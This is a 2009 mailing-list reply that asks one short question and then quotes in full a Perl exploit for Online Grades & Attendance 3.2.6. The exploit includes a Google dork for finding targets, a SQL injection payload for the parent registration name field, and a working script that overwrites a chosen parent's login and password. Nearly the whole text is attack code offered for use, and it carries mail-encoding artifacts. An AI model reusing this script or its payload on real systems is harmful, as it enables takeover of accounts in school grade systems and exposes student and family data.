Re: (Post Form --> Parent Register (name)) Credentials Changer (

Why do you include "TESTED ON: firefox 3"? Would you not be able to trigger this bug using other browsers? On Sun, May 31, 2009 at 8:53 PM, <y3nh4ck3r@gmail.com> wrote: > #!/usr/bin/perl > #------------------------------------------------------------------------= ------------------------------------------- > #(Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOI= T -- Online Grades & Attendance v-3.2.6--> > #------------------------------------------------------------------------= ------------------------------------------- > # > #CMS INFORMATION: > # > #-->WEB: http://www.onlinegrades.org/ > #-->DOWNLOAD: http://www.onlinegrades.org/ > #-->DEMO: http://www.onlinegrades.org/demo_info > #-->CATEGORY: CMS / Education > #-->DESCRIPTION: Online Grades is based on the project, Basmati. It has a= ll of the same > # =A0 =A0 =A0 =A0 =A0 =A0 =A0 features plus many new features. OG is a we= b based grade... > #-->RELEASED: 2009-02-05 > # > #CMS VULNERABILITY: > # > #-->TESTED ON: firefox 3 > #-->DORK: "Powered by Online Grades" > #-->CATEGORY: SQL INJECTION > #-->AFFECT VERSION: <=3D 3.2.6 > #-->Discovered Bug date: 2009-05-21 > #-->Reported Bug date: 2009-05-21 > #-->Fixed bug date: Not fixed > #-->Info patch: Not fixed > #-->Author: YEnH4ckEr > #-->mail: y3nh4ck3r[at]gmail[dot]com > #-->WEB/BLOG: N/A > #-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) = por su apoyo. > #-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) > # > # > #------------ > #CONDITIONS: > #------------ > # > #gpc_magic_quotes=3DOFF > # > #----------------- > #PRE-REQUIREMENTS > #----------------- > # > #Option --> Self Registration --> Allowed (Default value) > # > #------- > #NEED: > #------- > # > #Valid parent id > # > #--------------------------------------- > #PROOF OF CONCEPT (SQL INJECTION): > #--------------------------------------- > # > #Register module (name) is vuln to sql injection. 
> # > #Full name --> y3nh4ck3r', id=3D1 ON DUPLICATE KEY UPDATE client_id=3D'ow= ned'# > # > #Other parameters --> something > # > # > #Return: Change client_id to 'owned' for parent id=3D1 > # > # > ####################################################################### > ####################################################################### > ##*******************************************************************## > ## =A0SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... =A0= ## > ##*******************************************************************## > ##-------------------------------------------------------------------## > ##*******************************************************************## > ## =A0 =A0 =A0 =A0 =A0 =A0 =A0GREETZ TO: SPANISH H4ck3Rs community! =A0 = =A0 =A0 =A0 =A0 =A0 =A0 =A0## > ##*******************************************************************## > ####################################################################### > ####################################################################### > # > # > use LWP::UserAgent; > use HTTP::Request; > #Subroutines > sub lw > { > =A0 =A0 =A0 =A0my $SO =3D $^O; > =A0 =A0 =A0 =A0my $linux =3D ""; > =A0 =A0 =A0 =A0if (index(lc($SO),"win")!=3D-1){ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$linux=3D"0"; > =A0 =A0 =A0 =A0}else{ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$linux=3D"1"; > =A0 =A0 =A0 =A0} > =A0 =A0 =A0 =A0if($linux){ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0system("clear"); > =A0 =A0 =A0 =A0} > =A0 =A0 =A0 =A0else{ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0system("cls"); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0system ("title Online Grades Attendance v-= 3.2.6 (Credentials changer) Exploit"); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0system ("color 02"); > =A0 =A0 =A0 =A0} > } > sub request { > =A0 =A0 =A0 =A0my $userag =3D LWP::UserAgent->new; > =A0 =A0 =A0 =A0$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windo= ws NT 5.1)'); > =A0 =A0 =A0 =A0if($_[2] eq "post"){ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$request =3D 
HTTP::Request -> new(POST =3D= > $_[0]); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$request->referer($_[0]); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$request->content_type('application/x-www-= form-urlencoded'); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$request->content($_[1]); > =A0 =A0 =A0 =A0}else{ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$request =3D HTTP::Request -> new(GET =3D>= $_[0]); > =A0 =A0 =A0 =A0} > =A0 =A0 =A0 =A0my $outcode=3D $userag->request($request)->as_string; > =A0 =A0 =A0 =A0return $outcode; > } > sub error { > print "\t------------------------------------------------------------\n"; > =A0 =A0 =A0 =A0print "\tWeb isn't vulnerable!\n\n"; > =A0 =A0 =A0 =A0print "\t--->Maybe:\n\n"; > =A0 =A0 =A0 =A0print "\t\t1.-Patched.\n"; > =A0 =A0 =A0 =A0print "\t\t2.-Bad path or host.\n"; > =A0 =A0 =A0 =A0print "\t\tEXPLOIT FAILED!\n"; > =A0 =A0 =A0 =A0print "\t-------------------------------------------------= -----------\n"; > } > sub errormagicquotes { > print "\t------------------------------------------------------------\n"; > =A0 =A0 =A0 =A0print "\tWeb isn't vulnerable!\n\n"; > =A0 =A0 =A0 =A0print "\t\tRaison--> Magic quotes ON.\n"; > =A0 =A0 =A0 =A0print "\t\tEXPLOIT FAILED!\n"; > =A0 =A0 =A0 =A0print "\t-------------------------------------------------= -----------\n"; > } > sub helper { > =A0 =A0 =A0 =A0print "\n\t[!!!] Online Grades & Attendance <=3D v-3.2.6 (= Credentials changer) Exploit\n"; > =A0 =A0 =A0 =A0print "\t[!!!] USAGE MODE: [!!!]\n"; > =A0 =A0 =A0 =A0print "\t[!!!] perl $0 [HOST] [PATH] [Email Address] [Pass= word] [Target_id]\n"; > =A0 =A0 =A0 =A0print "\t[!!!] [HOST]: Web.\n"; > =A0 =A0 =A0 =A0print "\t[!!!] [PATH]: Home Path.\n"; > =A0 =A0 =A0 =A0print "\t[!!!] [Email Address]: Set value\n"; > =A0 =A0 =A0 =A0print "\t[!!!] [Password]: Set value\n"; > =A0 =A0 =A0 =A0print "\t[!!!] [Target_id]: victim id\n"; > =A0 =A0 =A0 =A0print "\t[!!!] 
Example: perl $0 'www.onlinegrades.org' 'de= mo' 'y3nh4ck3r' 'y3nh4ck3r' '1' \n"; > } > #Main > &lw; > print "\t#######################################################\n\n"; > print "\t#######################################################\n\n"; > print "\t## =A0 =A0 =A0 =A0Online Grades & Attendance <=3D v-3.2.6 =A0 = =A0 =A0##\n\n"; > print "\t## =A0 =A0 =A0 =A0 =A0 (Credentials changer) Exploit =A0 =A0 =A0= =A0 =A0 ##\n\n"; > print "\t## =A0 =A0 =A0 =A0 ++Conditions: magic_quotes=3DOFF =A0 =A0 =A0 = =A0 =A0 =A0##\n\n"; > print "\t## =A0 =A0 =A0 =A0 ++Needed: Valid parent id =A0 =A0 =A0 =A0 =A0= =A0 =A0 =A0 ##\n\n"; > print "\t## =A0 =A0 =A0 =A0 =A0 =A0 =A0 Author: Y3nh4ck3r =A0 =A0 =A0 =A0= =A0 =A0 =A0 =A0 =A0 ##\n\n"; > print "\t## =A0 =A0 =A0Contact:y3nh4ck3r[at]gmail[dot]com =A0 =A0 =A0 =A0= =A0 ##\n\n"; > print "\t## =A0 =A0 =A0 =A0 =A0 =A0Proud to be Spanish! =A0 =A0 =A0 =A0 = =A0 =A0 =A0 =A0 =A0 ##\n\n"; > print "\t#######################################################\n\n"; > print "\t#######################################################\n\n"; > #Init variables > my $host=3D$ARGV[0]; > my $path=3D$ARGV[1]; > my $client_id=3D$ARGV[2]; > my $client_pw=3D$ARGV[3]; > $numArgs =3D $#ARGV + 1; > if($numArgs<=3D3) > =A0 =A0 =A0 =A0{ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0&helper; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0exit(1); > =A0 =A0 =A0 =A0} > =A0 =A0 =A0 =A0if(!$ARGV[4]){ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$target_id=3D1; > =A0 =A0 =A0 =A0}else{ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$target_id=3D$ARGV[4]; > =A0 =A0 =A0 =A0} > > #Build uri > my $finalhost=3D"http://".$host."/".$path."/parents/register.php?action= =3Dregister"; > my $phpinfo=3D"http://".$host."/".$path."/include/phpinfo.php"; > #sql injection > $injection=3D"y3nh4ck3r', id=3D".$target_id." 
ON DUPLICATE KEY UPDATE cli= ent_id=3D'".$values."'#"; > $post=3D"name=3D".$injection."&email=3Dy3nh4ck3r%40gmail.com&pass1=3Dy3nh= 4ck3r&pass2=3Dy3nh4ck3r"; > $output=3D&request($phpinfo,0,'get'); > if($output=3D~(/\<tr\>\<td class\=3D\"e\">magic\_quotes\_gpc\<\/td\>\<td = class\=3D\"v\"\>On\<\/td\>\<td class\=3D\"v\"\>On\<\/td\>\<\/tr\>/)){ > =A0 =A0 =A0 =A0&errormagicquotes; > =A0 =A0 =A0 =A0exit(1); > } > $injection_email=3D"y3nh4ck3r', id=3D".$target_id." ON DUPLICATE KEY UPDA= TE client_id=3D'".$client_id."'#"; > $post=3D"name=3D".$injection_email."&email=3Dy3nh4ck3r%40gmail.com&pass1= =3Dy3nh4ck3r&pass2=3Dy3nh4ck3r"; > $output=3D&request($finalhost, $post, 'post'); > $injection_pw=3D"y3nh4ck3r', id=3D".$target_id." ON DUPLICATE KEY UPDATE = client_pw=3D'".$client_pw."'#"; > $post=3D"name=3D".$injection_pw."&email=3Dy3nh4ck3r%40gmail.com&pass1=3Dy= 3nh4ck3r&pass2=3Dy3nh4ck3r"; > $output=3D&request($finalhost, $post, 'post'); > #processed > if($output!~(/\<strong\>ERROR\<\/strong\>/)) > { > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\n\t-------------------------------= ----------------------------------\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t-- =A0EXPLOIT EXECUTED (Online Gr= ades & Attendance <=3D v-3.2.6) =A0 --\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t-- =A0 =A0 =A0 =A0 =A0 =A0 =A0 = =A0 =A0(Credentials changer) Exploit =A0 =A0 =A0 =A0 =A0 =A0 =A0--\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t---------------------------------= --------------------------------\n\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t\tParent credentials changed!\n\n= "; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t\tIf id doesn't exist, you add a = new inconsistent user!\n\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\n\t<<<<<<----------------------FIN= ISH!---------------->>>>>>>>\n\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t<<<<<<--------------Thanks to: y3= hn4ck3r------------>>>>>>>\n\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t<<<<<<-----------------------EOF-= 
------------------->>>>>>>\n\n"; > }else{ > =A0 =A0 =A0 =A0&error; > } > exit(1); > #Ok...all job done >